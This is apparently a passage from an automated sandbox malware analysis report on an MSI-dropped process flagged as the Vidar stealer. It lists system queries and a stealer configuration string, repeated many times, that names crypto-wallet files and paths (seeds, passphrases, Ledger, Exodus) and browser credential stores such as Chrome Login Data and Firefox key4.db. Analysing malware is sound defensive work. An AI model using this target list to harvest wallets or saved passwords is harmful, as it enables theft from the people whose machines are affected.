            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F9CB40 cpuid 4_2_00007FF749F9CB40
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,4_2_00007FF749F97BB4
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: GetLocaleInfoEx,FormatMessageA,4_2_00007FF749F52C64
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: EnumSystemLocalesW,4_2_00007FF749F97F18
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: EnumSystemLocalesW,4_2_00007FF749F97FE8
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_00007FF749F98080
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: EnumSystemLocalesW,4_2_00007FF749F90EE4
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: GetLocaleInfoW,4_2_00007FF749F91430
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_00007FF749F98428
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: GetLocaleInfoW,4_2_00007FF749F984DC
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: GetLocaleInfoW,4_2_00007FF749F982D0
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: GetLocaleInfoEx,4_2_00007FF749F775BC
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: EnumSystemLocalesW,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_00007FF749F98620
            Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F78D5C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_00007FF749F78D5C
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F9E652 GetUserNameW,26_2_00F9E652
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F91CAC _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,4_2_00007FF749F91CAC
            Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: 16_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,16_2_00406831
            Source: C:\Windows\System32\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Vidar stealer
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: 0000001A.00000002.3007890735.00000000041F9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Corrections.com PID: 7808, type: MEMORYSTR
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: Corrections.com, 0000001A.00000002.3001813425.00000000009D0000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: *electrum*.*
            Source: Corrections.com, 0000001A.00000002.3007890735.00000000041F9000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: us\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: Corrections.com, 0000001A.00000002.3007890735.00000000041F9000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
            Source: Corrections.com, 0000001A.00000002.3007890735.00000000041F9000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: us\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: Corrections.com, 0000001A.00000002.3007890735.00000000041F9000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: us\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: Corrections.com, 0000001A.00000002.3007890735.00000000041F9000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: us\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: Corrections.com, 0000001A.00000002.3007890735.00000000041F9000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: us\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: Corrections.com, 0000001A.00000002.3007890735.00000000041F9000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
            Source: Corrections.com, 0000001A.00000002.3007890735.00000000041F9000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: us\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: Corrections.com, 0000001A.00000002.3007890735.00000000041F9000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
            Source: Corrections.com, 0000001A.00000002.3001813425.00000000009D0000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: *exodus*.*
            Source: Corrections.com, 0000001A.00000002.3001813425.00000000009D0000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: *ethereum*.*
            Source: Corrections.com, 0000001A.00000002.3007890735.00000000041F9000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: us\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: Corrections.com, 0000001A.00000002.3007890735.00000000041F9000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: us\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: Corrections.com, 0000001A.00000002.3007890735.00000000041F9000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: us\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: Corrections.com, 0000001A.00000002.3007890735.00000000041F9000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: us\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: powershell.exe, 00000009.00000002.2107972930.0000017A10075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored
            Source: Corrections.com, 0000001A.00000002.3007890735.00000000041F9000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets\
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
